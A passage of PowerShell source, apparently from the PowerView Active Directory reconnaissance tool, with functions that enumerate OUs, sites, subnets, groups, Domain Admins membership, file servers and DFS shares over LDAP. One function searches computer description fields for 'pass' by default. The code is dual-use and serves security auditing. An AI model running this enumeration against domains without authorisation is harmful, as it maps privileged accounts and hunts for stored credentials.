-DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -Property $Properties } else { # extract out just the property names Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -first 1 | Get-Member -MemberType *Property | Select-Object -Property "Name" } } function Find-ComputerField { <# .SYNOPSIS Searches computer object fields for a given word (default *pass*). Default field being searched is 'description'. Taken directly from @obscuresec's post: http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html .PARAMETER SearchTerm Term to search for, default of "pass". .PARAMETER SearchField User field to search in, default of "description". .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER Domain Domain to search computer fields for, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Find-ComputerField -SearchTerm backup -SearchField info Find computer accounts with "backup" in the "info" field. #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [Alias('Term')] [String] $SearchTerm = 'pass', [Alias('Field')] [String] $SearchField = 'description', [String] $ADSpath, [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) process { Get-NetComputer -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField } } function Get-NetOU { <# .SYNOPSIS Gets a list of all current OUs in a domain. .PARAMETER OUName The OU name to query for, wildcards accepted. .PARAMETER GUID Only return OUs with the specified GUID in their gplink property. .PARAMETER Domain The domain to query for OUs, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through. .PARAMETER FullData Switch. Return full OU objects instead of just object names (the default). .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetOU Returns the current OUs in the domain. .EXAMPLE PS C:\> Get-NetOU -OUName *admin* -Domain testlab.local Returns all OUs with "admin" in their name in the testlab.local domain. .EXAMPLE PS C:\> Get-NetOU -GUID 123-... Returns all OUs with linked to the specified group policy object. .EXAMPLE PS C:\> "*admin*","*server*" | Get-NetOU Get the full OU names for the given search terms piped on the pipeline. #> [CmdletBinding()] Param ( [Parameter(ValueFromPipeline=$True)] [String] $OUName = '*', [String] $GUID, [String] $Domain, [String] $DomainController, [String] $ADSpath, [Switch] $FullData, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) begin { $OUSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize } process { if ($OUSearcher) { if ($GUID) { # if we're filtering for a GUID in .gplink $OUSearcher.filter="(&(objectCategory=organizationalUnit)(name=$OUName)(gplink=*$GUID*))" } else { $OUSearcher.filter="(&(objectCategory=organizationalUnit)(name=$OUName))" } try { $Results = $OUSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { if ($FullData) { # convert/process the LDAP fields for each result $OU = Convert-LDAPProperty -Properties $_.Properties $OU.PSObject.TypeNames.Add('PowerView.OU') $OU } else { # otherwise just returning the ADS paths of the OUs $_.properties.adspath } } $Results.dispose() $OUSearcher.dispose() } catch { Write-Warning $_ } } } } function Get-NetSite { <# .SYNOPSIS Gets a list of all current sites in a domain. .PARAMETER SiteName Site filter string, wildcards accepted. .PARAMETER Domain The domain to query for sites, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through. .PARAMETER GUID Only return site with the specified GUID in their gplink property. .PARAMETER FullData Switch. Return full site objects instead of just object names (the default). .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetSite -Domain testlab.local -FullData Returns the full data objects for all sites in testlab.local #> [CmdletBinding()] Param ( [Parameter(ValueFromPipeline=$True)] [String] $SiteName = "*", [String] $Domain, [String] $DomainController, [String] $ADSpath, [String] $GUID, [Switch] $FullData, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) begin { $SiteSearcher = Get-DomainSearcher -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSprefix "CN=Sites,CN=Configuration" -PageSize $PageSize } process { if($SiteSearcher) { if ($GUID) { # if we're filtering for a GUID in .gplink $SiteSearcher.filter="(&(objectCategory=site)(name=$SiteName)(gplink=*$GUID*))" } else { $SiteSearcher.filter="(&(objectCategory=site)(name=$SiteName))" } try { $Results = $SiteSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { if ($FullData) { # convert/process the LDAP fields for each result $Site = Convert-LDAPProperty -Properties $_.Properties $Site.PSObject.TypeNames.Add('PowerView.Site') $Site } else { # otherwise just return the site name $_.properties.name } } $Results.dispose() $SiteSearcher.dispose() } catch { Write-Verbose $_ } } } } function Get-NetSubnet { <# .SYNOPSIS Gets a list of all current subnets in a domain. .PARAMETER SiteName Only return subnets from the specified SiteName. .PARAMETER Domain The domain to query for subnets, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through. .PARAMETER FullData Switch. Return full subnet objects instead of just object names (the default). .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetSubnet Returns all subnet names in the current domain. .EXAMPLE PS C:\> Get-NetSubnet -Domain testlab.local -FullData Returns the full data objects for all subnets in testlab.local #> [CmdletBinding()] Param ( [Parameter(ValueFromPipeline=$True)] [String] $SiteName = "*", [String] $Domain, [String] $ADSpath, [String] $DomainController, [Switch] $FullData, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) begin { $SubnetSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -ADSprefix "CN=Subnets,CN=Sites,CN=Configuration" -PageSize $PageSize } process { if($SubnetSearcher) { $SubnetSearcher.filter="(&(objectCategory=subnet))" try { $Results = $SubnetSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { if ($FullData) { # convert/process the LDAP fields for each result Convert-LDAPProperty -Properties $_.Properties | Where-Object { $_.siteobject -match "CN=$SiteName" } } else { # otherwise just return the subnet name and site name if ( ($SiteName -and ($_.properties.siteobject -match "CN=$SiteName,")) -or ($SiteName -eq '*')) { $SubnetProperties = @{ 'Subnet' = $_.properties.name[0] } try { $SubnetProperties['Site'] = ($_.properties.siteobject[0]).split(",")[0] } catch { $SubnetProperties['Site'] = 'Error' } New-Object -TypeName PSObject -Property $SubnetProperties } } } $Results.dispose() $SubnetSearcher.dispose() } catch { Write-Warning $_ } } } } function Get-DomainSID { <# .SYNOPSIS Gets the SID for the domain. .PARAMETER Domain The domain to query, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .EXAMPLE C:\> Get-DomainSID -Domain TEST Returns SID for the domain 'TEST' #> param( [String] $Domain, [String] $DomainController ) $DCSID = Get-NetComputer -Domain $Domain -DomainController $DomainController -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)' | Select-Object -First 1 -ExpandProperty objectsid if($DCSID) { $DCSID.Substring(0, $DCSID.LastIndexOf('-')) } else { Write-Verbose "Error extracting domain SID for $Domain" } } function Get-NetGroup { <# .SYNOPSIS Gets a list of all current groups in a domain, or all the groups a given user/group object belongs to. .PARAMETER GroupName The group name to query for, wildcards accepted. .PARAMETER SID The group SID to query for. .PARAMETER UserName The user name (or group name) to query for all effective groups of. .PARAMETER Filter A customized ldap filter string to use, e.g. "(description=*admin*)" .PARAMETER Domain The domain to query for groups, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER AdminCount Switch. Return group with adminCount=1. .PARAMETER FullData Switch. Return full group objects instead of just object names (the default). .PARAMETER RawSids Switch. Return raw SIDs when using "Get-NetGroup -UserName X" .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .PARAMETER AllTypes By default we will retrieve only Security, not Distribution Groups. .EXAMPLE PS C:\> Get-NetGroup Returns the current security groups in the domain. .EXAMPLE PS C:\> Get-NetGroup -GroupName *admin* Returns all groups with "admin" in their group name. .EXAMPLE PS C:\> Get-NetGroup -Domain testing -FullData Returns full group data objects in the 'testing' domain #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [String] $GroupName = '*', [String] $SID, [String] $UserName, [String] $Filter, [String] $Domain, [String] $DomainController, [String] $ADSpath, [Switch] $AdminCount, [Switch] $FullData, [Switch] $RawSids, [Switch] $AllTypes, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) begin { $GroupSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize if (!$AllTypes) { $Filter += "(groupType:1.2.840.113556.1.4.803:=2147483648)" } } process { if($GroupSearcher) { if($AdminCount) { Write-Verbose "Checking for adminCount=1" $Filter += "(admincount=1)" } if ($UserName) { # get the raw user object $User = Get-ADObject -SamAccountName $UserName -Domain $Domain -DomainController $DomainController -Credential $Credential -ReturnRaw -PageSize $PageSize | Select-Object -First 1 if($User) { # convert the user to a directory entry $UserDirectoryEntry = $User.GetDirectoryEntry() # cause the cache to calculate the token groups for the user $UserDirectoryEntry.RefreshCache("tokenGroups") $UserDirectoryEntry.TokenGroups | ForEach-Object { # convert the token group sid $GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value # ignore the built in groups if($GroupSid -notmatch '^S-1-5-32-.*') { if($FullData) { $Group = Get-ADObject -SID $GroupSid -PageSize $PageSize -Domain $Domain -DomainController $DomainController -Credential $Credential $Group.PSObject.TypeNames.Add('PowerView.Group') $Group } else { if($RawSids) { $GroupSid } else { Convert-SidToName -SID $GroupSid } } } } } else { Write-Warning "UserName '$UserName' failed to resolve." } } else { if ($SID) { $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)" } else { $GroupSearcher.filter = "(&(objectCategory=group)(samaccountname=$GroupName)$Filter)" } $Results = $GroupSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { # if we're returning full data objects if ($FullData) { # convert/process the LDAP fields for each result $Group = Convert-LDAPProperty -Properties $_.Properties $Group.PSObject.TypeNames.Add('PowerView.Group') $Group } else { # otherwise we're just returning the group name $_.properties.samaccountname } } $Results.dispose() $GroupSearcher.dispose() } } } } function Get-NetGroupMember { <# .SYNOPSIS This function users [ADSI] and LDAP to query the current AD context or trusted domain for users in a specified group. If no GroupName is specified, it defaults to querying the "Domain Admins" group. This is a replacement for "net group 'name' /domain" .PARAMETER GroupName The group name to query for users. .PARAMETER SID The Group SID to query for users. If not given, it defaults to 512 "Domain Admins" .PARAMETER Filter A customized ldap filter string to use, e.g. "(description=*admin*)" .PARAMETER Domain The domain to query for group users, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER FullData Switch. Returns full data objects instead of just group/users. .PARAMETER Recurse Switch. If the group member is a group, recursively try to query its members as well. .PARAMETER UseMatchingRule Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query when -Recurse is specified. Much faster than manual recursion, but doesn't reveal cross-domain groups. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetGroupMember Returns the usernames that of members of the "Domain Admins" domain group. .EXAMPLE PS C:\> Get-NetGroupMember -Domain testing -GroupName "Power Users" Returns the usernames that of members of the "Power Users" group in the 'testing' domain. .LINK http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/ #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [String] $GroupName, [String] $SID, [String] $Domain, [String] $DomainController, [String] $ADSpath, [Switch] $FullData, [Switch] $Recurse, [Switch] $UseMatchingRule, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) begin { if($DomainController) { $TargetDomainController = $DomainController } else { $TargetDomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name } if($Domain) { $TargetDomain = $Domain } else { $TargetDomain = Get-NetDomain -Credential $Credential | Select-Object -ExpandProperty name } # so this isn't repeated if users are passed on the pipeline $GroupSearcher = Get-DomainSearcher -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize } process { if ($GroupSearcher) { if ($Recurse -and $UseMatchingRule) { # resolve the group to a distinguishedname if ($GroupName) { $Group = Get-NetGroup -AllTypes -GroupName $GroupName -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize } elseif ($SID) { $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize } else { # default to domain admins $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512" $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize } $GroupDN = $Group.distinguishedname $GroupFoundName = $Group.samaccountname if ($GroupDN) { $GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupDN)$Filter)" $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName','samaccounttype','lastlogon','lastlogontimestamp','dscorepropagationdata','objectsid','whencreated','badpasswordtime','accountexpires','iscriticalsystemobject','name','usnchanged','objectcategory','description','codepage','instancetype','countrycode','distinguishedname','cn','admincount','logonhours','objectclass','logoncount','usncreated','useraccountcontrol','objectguid','primarygroupid','lastlogoff','samaccountname','badpwdcount','whenchanged','memberof','pwdlastset','adspath')) $Members = $GroupSearcher.FindAll() $GroupFoundName = $GroupName } else { Write-Error "Unable to find Group" } } else { if ($GroupName) { $GroupSearcher.filter = "(&(objectCategory=group)(samaccountname=$GroupName)$Filter)" } elseif ($SID) { $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)" } else { # default to domain admins $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512" $GroupSearcher.filter = "(&(objectCategory=group)(objectSID=$SID)$Filter)" } try { $Result = $GroupSearcher.FindOne() } catch { $Members = @() } $GroupFoundName = '' if ($Result) { $Members = $Result.properties.item("member") if($Members.count -eq 0) { $Finished = $False $Bottom = 0 $Top = 0 while(!$Finished) { $Top = $Bottom + 1499 $MemberRange="member;range=$Bottom-$Top" $Bottom += 1500 $GroupSearcher.PropertiesToLoad.Clear() [void]$GroupSearcher.PropertiesToLoad.Add("$MemberRange") [void]$GroupSearcher.PropertiesToLoad.Add("samaccountname") try { $Result = $GroupSearcher.FindOne() $RangedProperty = $Result.Properties.PropertyNames -like "member;range=*" $Members += $Result.Properties.item($RangedProperty) $GroupFoundName = $Result.properties.item("samaccountname")[0] if ($Members.count -eq 0) { $Finished = $True } } catch [System.Management.Automation.MethodInvocationException] { $Finished = $True } } } else { $GroupFoundName = $Result.properties.item("samaccountname")[0] $Members += $Result.Properties.item($RangedProperty) } } $GroupSearcher.dispose() } $Members | Where-Object {$_} | ForEach-Object { # if we're doing the LDAP_MATCHING_RULE_IN_CHAIN recursion if ($Recurse -and $UseMatchingRule) { $Properties = $_.Properties } else { if($TargetDomainController) { $Result = [adsi]"LDAP://$TargetDomainController/$_" } else { $Result = [adsi]"LDAP://$_" } if($Result){ $Properties = $Result.Properties } } if($Properties) { $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Properties.samaccounttype if ($FullData) { $GroupMember = Convert-LDAPProperty -Properties $Properties } else { $GroupMember = New-Object PSObject } $GroupMember | Add-Member Noteproperty 'GroupDomain' $TargetDomain $GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName if($Properties.objectSid) { $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectSid[0],0).Value) } else { $MemberSID = $Null } try { $MemberDN = $Properties.distinguishedname[0] if (($MemberDN -match 'ForeignSecurityPrincipals') -and ($MemberDN -match 'S-1-5-21')) { try { if(-not $MemberSID) { $MemberSID = $Properties.cn[0] } $MemberSimpleName = Convert-SidToName -SID $MemberSID | Convert-ADName -InputType 'NT4' -OutputType 'Simple' if($MemberSimpleName) { $MemberDomain = $MemberSimpleName.Split('@')[1] } else { Write-Warning "Error converting $MemberDN" $MemberDomain = $Null } } catch { Write-Warning "Error converting $MemberDN" $MemberDomain = $Null } } else { # extract the FQDN from the Distinguished Name $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' } } catch { $MemberDN = $Null $MemberDomain = $Null } if ($Properties.samaccountname) { # forest users have the samAccountName set $MemberName = $Properties.samaccountname[0] } else { # external trust users have a SID, so convert it try { $MemberName = Convert-SidToName $Properties.cn[0] } catch { # if there's a problem contacting the domain to resolve the SID $MemberName = $Properties.cn } } $GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain $GroupMember | Add-Member Noteproperty 'MemberName' $MemberName $GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID $GroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup $GroupMember | Add-Member Noteproperty 'MemberDN' $MemberDN $GroupMember.PSObject.TypeNames.Add('PowerView.GroupMember') $GroupMember # if we're doing manual recursion if ($Recurse -and !$UseMatchingRule -and $IsGroup -and $MemberName) { if($FullData) { Get-NetGroupMember -FullData -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize } else { Get-NetGroupMember -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize } } } } } } } function Get-NetFileServer { <# .SYNOPSIS Returns a list of all file servers extracted from user homedirectory, scriptpath, and profilepath fields. .PARAMETER Domain The domain to query for user file servers, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER TargetUsers An array of users to query for file servers. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetFileServer Returns active file servers. .EXAMPLE PS C:\> Get-NetFileServer -Domain testing Returns active file servers for the 'testing' domain. #> [CmdletBinding()] param( [String] $Domain, [String] $DomainController, [String[]] $TargetUsers, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) function SplitPath { # short internal helper to split UNC server paths param([String]$Path) if ($Path -and ($Path.split("\\").Count -ge 3)) { $Temp = $Path.split("\\")[2] if($Temp -and ($Temp -ne '')) { $Temp } } } $filter = "(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(scriptpath=*)(homedirectory=*)(profilepath=*))" Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -Filter $filter | Where-Object {$_} | Where-Object { # filter for any target users if($TargetUsers) { $TargetUsers -Match $_.samAccountName } else { $True } } | ForEach-Object { # split out every potential file server path if($_.homedirectory) { SplitPath($_.homedirectory) } if($_.scriptpath) { SplitPath($_.scriptpath) } if($_.profilepath) { SplitPath($_.profilepath) } } | Where-Object {$_} | Sort-Object -Unique } function Get-DFSshare { <# .SYNOPSIS Returns a list of all fault-tolerant distributed file systems for a given domain. .PARAMETER Version The version of DFS to query for servers. 1/v1, 2/v2, or all .PARAMETER Domain The domain to query for user DFS shares, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-DFSshare Returns all distributed file system shares for the current domain. .EXAMPLE PS C:\> Get-DFSshare -Domain test Returns all distributed file system shares for the 'test' domain. #> [CmdletBinding()] param( [String] [ValidateSet("All","V1","1","V2","2")] $Version = "All", [String] $Domain, [String] $DomainController, [String] $ADSpath, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) function Parse-Pkt { [CmdletBinding()] param( [byte[]] $Pkt ) $bin = $Pkt $blob_version = [bitconverter]::ToUInt32($bin[0..3],0) $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0) $offset = 8 #https://msdn.microsoft.com/en-us/library/cc227147.aspx $object_list = @() for($i=1; $i -le $blob_element_count; $i++){ $blob_name_size_start = $offset $blob_name_size_end = $offset + 1 $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0) $blob_name_start = $blob_name_size_end + 1 $blob_name_end = $blob_name_start + $blob_name_size - 1 $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end]) $blob_data_size_start = $blob_name_end + 1 $blob_data_size_end = $blob_data_size_start + 3 $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0) $blob_data_start = $blob_data_size_end + 1 $blob_data_end = $blob_data_start + $blob_data_size - 1 $blob_data = $bin[$blob_data_start..$blob_data_end] switch -wildcard ($blob_name) { "\siteroot" { } "\domainroot*" { # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first... # DFSRootOrLinkIDBlob $root_or_link_guid_start = 0 $root_or_link_guid_end = 15 $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end] $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str $prefix_size_start = $root_or_link_guid_end + 1 $prefix_size_end = $prefix_size_start + 1 $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0) $prefix_start = $prefix_size_end + 1 $prefix_end = $prefix_start + $prefix_size - 1 $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end]) $short_prefix_size_start = $prefix_end + 1 $short_prefix_size_end = $short_prefix_size_start + 1 $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0) $short_prefix_start = $short_prefix_size_end + 1 $short_prefix_end = $short_prefix_start + $short_prefix_size - 1 $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end]) $type_start = $short_prefix_end + 1 $type_end = $type_start + 3 $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0) $state_start = $type_end + 1 $state_end = $state_start + 3 $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0) $comment_size_start = $state_end + 1 $comment_size_end = $comment_size_start + 1 $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0) $comment_start = $comment_size_end + 1 $comment_end = $comment_start + $comment_size - 1 if ($comment_size -gt 0) { $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end]) } $prefix_timestamp_start = $comment_end + 1 $prefix_timestamp_end = $prefix_timestamp_start + 7 # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime $state_timestamp_start = $prefix_timestamp_end + 1 $state_timestamp_end = $state_timestamp_start + 7 $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end] $comment_timestamp_start = $state_timestamp_end + 1 $comment_timestamp_end = $comment_timestamp_start + 7 $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end] $version_start = $comment_timestamp_end + 1 $version_end = $version_start + 3 $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0) # Parse rest of DFSNamespaceRootOrLinkBlob here $dfs_targetlist_blob_size_start = $version_end + 1 $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3 $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0) $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1 $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1 $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end] $reserved_blob_size_start = $dfs_targetlist_blob_end + 1 $reserved_blob_size_end = $reserved_blob_size_start + 3 $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0) $reserved_blob_start = $reserved_blob_size_end + 1 $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1 $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end] $referral_ttl_start = $reserved_blob_end + 1 $referral_ttl_end = $referral_ttl_start + 3 $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0) #Parse DFSTargetListBlob $target_count_start = 0 $target_count_end = $target_count_start + 3 $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0) $t_offset = $target_count_end + 1 for($j=1; $j -le $target_count; $j++){ $target_entry_size_start = $t_offset $target_entry_size_end = $target_entry_size_start + 3 $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0) $target_time_stamp_start = $target_entry_size_end + 1 $target_time_stamp_end = $target_time_stamp_start + 7 # FILETIME again or special if priority rank and priority class 0 $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end] $target_state_start = $target_time_stamp_end + 1 $target_state_end = $target_state_start + 3 $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0) $target_type_start = $target_state_end + 1 $target_type_end = $target_type_start + 3 $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0) $server_name_size_start = $target_type_end + 1 $server_name_size_end = $server_name_size_start + 1 $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0) $server_name_start = $server_name_size_end + 1 $server_name_end = $server_name_start + $server_name_size - 1 $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end]) $share_name_size_start = $server_name_end + 1 $share_name_size_end = $share_name_size_start + 1 $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0) $share_name_start = $share_name_size_end + 1 $share_name_end = $share_name_start + $share_name_size - 1 $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end]) $target_list += "\\$server_name\$share_name" $t_offset = $share_name_end + 1 } } } $offset = $blob_data_end + 1 $dfs_pkt_properties = @{ 'Name' = $blob_name 'Prefix' = $prefix 'TargetList' = $target_list } $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties $prefix = $null $blob_name = $null $target_list = $null } $servers = @() $object_list | ForEach-Object { if ($_.TargetList) { $_.TargetList | ForEach-Object { $servers += $_.split("\")[2] } } } $servers } function Get-DFSshareV1 { [CmdletBinding()] param( [String] $Domain, [String] $DomainController, [String] $ADSpath, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize if($DFSsearcher) { $DFSshares = @() $DFSsearcher.filter = "(&(objectClass=fTDfs))" try { $Results = $DFSSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { $Properties = $_.Properties $RemoteNames = $Properties.remoteservername $Pkt = $Properties.pkt $DFSshares += $RemoteNames | ForEach-Object { try { if ( $_.Contains('\') ) { New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split("\")[2]} } } catch { Write-Verbose "Error in parsing DFS share : $_" } } } $Results.dispose() $DFSSearcher.dispose() if($pkt -and $pkt[0]) { Parse-Pkt $pkt[0] | ForEach-Object { # If a folder doesn't have a redirection it will # have a target like # \\null\TestNameSpace\folder\.DFSFolderLink so we # do actually want to match on "null" rather than # $null if ($_ -ne "null") { New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_} } } } } catch { Write-Warning "Get-DFSshareV1 error : $_" } $DFSshares | Sort-Object -Property "RemoteServerName" } } function Get-DFSshareV2 { [CmdletBinding()] param( [String] $Domain, [String] $DomainController, [String] $ADSpath, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize if($DFSsearcher) { $DFSshares = @() $DFSsearcher.filter = "(&(objectClass=msDFS-Linkv2))" 